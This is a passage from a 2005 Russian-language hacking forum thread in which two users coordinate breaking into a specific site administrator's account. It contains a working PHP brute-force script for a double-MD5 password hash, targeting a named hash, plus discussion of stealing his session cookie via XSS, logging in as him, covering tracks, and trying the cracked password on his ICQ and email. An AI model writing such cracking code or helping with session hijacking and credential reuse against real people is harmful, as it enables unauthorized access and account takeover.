ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #21  
Старый 12.10.2005, 00:36
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

Цитата:
А исходник тот который Rebz дал
Рад помочь -) молодцы ребята, что разобрались =)
 
Ответить с цитированием

  #22  
Старый 12.10.2005, 02:44
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Цитата:
<?

$hash="55994831ef1efc93f541e94bf84fd1cd";
$sym="1234567890";
$max=3;
$min=6;
$var=0;
$time=mktime();
$timenow=mktime();
$sec=0;
for($i=$max;$i<=$min;$i++)
{
$var+=pow(strlen($sym),$i);
}
$filename="nordmoon_rnd6";
$handle = fopen($filename, 'a');
function outpass($text,$sym)
{
global $min,$max,$filename,$handle,$hash,$count,$time,$se c,$var;
if(strlen($text)<$min)
{
for($i=0;$i<strlen($sym);$i++)
{
$text1=$text;
$text1.="$sym[$i]";

if(($time+1)==mktime()) { $sec++; $time=mktime(); echo "$count - Variantov iz $var Speed ".round($count/$sec)." Var per sec. Ostalos ".round(($var-$count)/round($count/$sec))." sec \n"; }
if(strlen($text)>$min) break;
if(strlen($text1)>=$max)
{
$count++;

if($hash==md5(md5($text1)))
{
fwrite($handle, "$text1");
echo "!!!!!!! $text1 !!!!!!!!\n";
}
}

outpass($text1,$sym);

}

}

}
$count=0;
for($i=0;$i<strlen($sym);$i++)
{
$text=$sym[$i];
if($hash==md5(md5($text)))
{
fwrite($handle, "$text");
echo "!!!!!!! $text1 !!!!!!!!\n";

}
$count++;
outpass($text,$sym);
}
fclose($handle);

?>
Вот тебе брут... Токо там мин с макс перепутаны... Я накануне с лазанами нарезался так что сам удивился, что что-то написал вообще.... С помощью него попробуй набрутить.
Либо http://www.antsight.com/zsl/rainbowcrack/ там скачай исходники брута, децл измени, откэмпи и юзай.


А так кукисы изай. Админка там простая) токо почему-то база не качается( ну да лан сам разберёшься...
ЗЫ: Сильно не критекуйте))) Я имею ввиду код.

Последний раз редактировалось Kond4r; 12.10.2005 в 04:25..
 
Ответить с цитированием

  #23  
Старый 12.10.2005, 10:14
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)

Скачал исходники брута ( http://www.antsight.com/zsl/rainbowc...ck-1.2-win.zip ) а как запустить? и на каком языке он сделан?
ps я просто парю потому что, хочу таким образом "разделаться" еще с 3 такими же движками (прикинь они полностью одинаковые =) )
---
млин нео пароль сменил =( .kond4r поосторожней надо быть, просто я там трепался мол поломаю вас и тд и тп ну нео посмеялся думал я шучу,он вообще админ шустрый, в любое время может на сайт зайти, если получится еще раз с xss то надо будет как-то закрепиться... да зачем ты там оставил фаил "own.php" ты думаешь он бы его не заметил..?=)
...нео зашол прям сразу за тобой(neo ... 12.10.2005 - 03:16:05
kond4r ... 12.10.2005 - 03:15:06
), может он тебя заметил, тогда дело плохо

Последний раз редактировалось Tikson; 12.10.2005 в 10:54..
 
Ответить с цитированием

  #24  
Старый 12.10.2005, 12:36
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Нихрена он не сменил!!!!
файл я там не оставлял! всё чисто, даже xss удалил из форума, да и ещё пару сообщений где кто-то этим xss пытался тож ссесию сбрить, причём не удачно: какой-то 0007 написал через жопу, так на форуме было сообщение вида new Image; i.src=.... ну и т.д.

Токо что заходил под его кукой всё нормально!

Цитата:
...нео зашол прям сразу за тобой(neo ... 12.10.2005 - 03:16:05 kond4r ... 12.10.2005 - 03:15:06
это я и защёл)))) сначала так, потом как нео))))
нео в люльке пузыри пускал в это время.

Последний раз редактировалось Kond4r; 12.10.2005 в 12:55..
 
Ответить с цитированием

  #25  
Старый 12.10.2005, 12:57
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Кстати когда пароль подберёшь, попробуй на асе и мыле его, может подойдёт)
мыло у него странное mail@e107.ru
 
Ответить с цитированием

  #26  
Старый 12.10.2005, 13:27
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

Kond4r млин =))))))))))
это ж я 0007 , это мое кодовое имя в данной операции не мог жы я зайти как Tikson, neo бы сразу в гугле мой бы ник ввел бы и тогда пипец, я ж одно время днем и ночью форумы phpbb и другие ломал, на меня даже какой то админ помню наехал обещал расправой, обошлось...
А я чето с его куками зайти не могу, может я пытался зайти когда там уже кто-то был...
ты не ответил
####
это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)

Скачал исходники брута ( http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) а как запустить? и на каком языке он сделан?
####
 
Ответить с цитированием

  #27  
Старый 12.10.2005, 13:34
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

Цитата:
А я чето с его куками зайти не могу, может я пытался зайти когда там уже кто-то был...
вообще по идее должно быть пок, там мона под одним паролем хоть всей россией сидеть... значит что-то на так в куках прописал там нет ссесии!! в куках прописывается токо id.passhash и всё.
Цитата:
это ты брут для пароля 55994831ef1efc93f541e94bf84fd1cd спецмально написал?Да, я понял что мин с макс надо поменять ...тока как его юзать\компилить? =)
нет это брут специально для двойного хэша, при желании его мна изменить, чтоб он хэши из файла какого-нить выжёргивал, а так просто меняй $hash

Это пхп... Юзать >php файл.php

Цитата:
Скачал исходники брута ( http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) а как запустить? и на каком языке он сделан?
сделан на си, я лично строил в unix...

Последний раз редактировалось Kond4r; 12.10.2005 в 13:39..
 
Ответить с цитированием

  #28  
Старый 12.10.2005, 14:03
Tikson
Постоянный
Регистрация: 09.10.2005
Сообщений: 333
Провел на форуме:
1387660

Репутация: 74
По умолчанию

лана еще раз с куками зайду, странно первый раз полусилось,второй нет, но я еще попробую...
вообщето это понятно что это php (<? содержание ?>) , только когда я пишу в cmd
php 1\neo.php
пишут что php не я вляется внутренней или внешней командой, исполняемой проограммой или пакетным фаилом
вобщем получается что мне надо поставить php?!!! ага а под винду он есть???=)
блин брут (http://www.antsight.com/zsl/rainbow...ack-1.2-win.zip ) на си...=( а у меня винда и эмулятора нет и шела нет ...
 
Ответить с цитированием

  #29  
Старый 12.10.2005, 23:37
Kond4r
Участник форума
Регистрация: 27.09.2005
Сообщений: 103
Провел на форуме:
283836

Репутация: 3
По умолчанию

http://www.php.net/downloads.php качай и юзай то что я те дал)
Ну если каки евопросы стучись 311-628-846

Последний раз редактировалось Azazel; 04.12.2005 в 17:40..
 
Ответить с цитированием

  #30  
Старый 13.10.2005, 13:42
Rebz
Super Moderator
Регистрация: 08.11.2004
Сообщений: 3,395
Провел на форуме:
13166814

Репутация: 3876


По умолчанию

эй! ребят! только не надо флуда и оффтопа. Высказываемся по теме.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Движок сайта МГПИ - спёкся! n4r0$ Болталка 6 27.03.2009 11:43
Что это за движок? azeri_hacker Болталка 10 11.07.2005 18:43
Суперпупер движок [CH]P] Болталка 0 17.04.2005 23:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ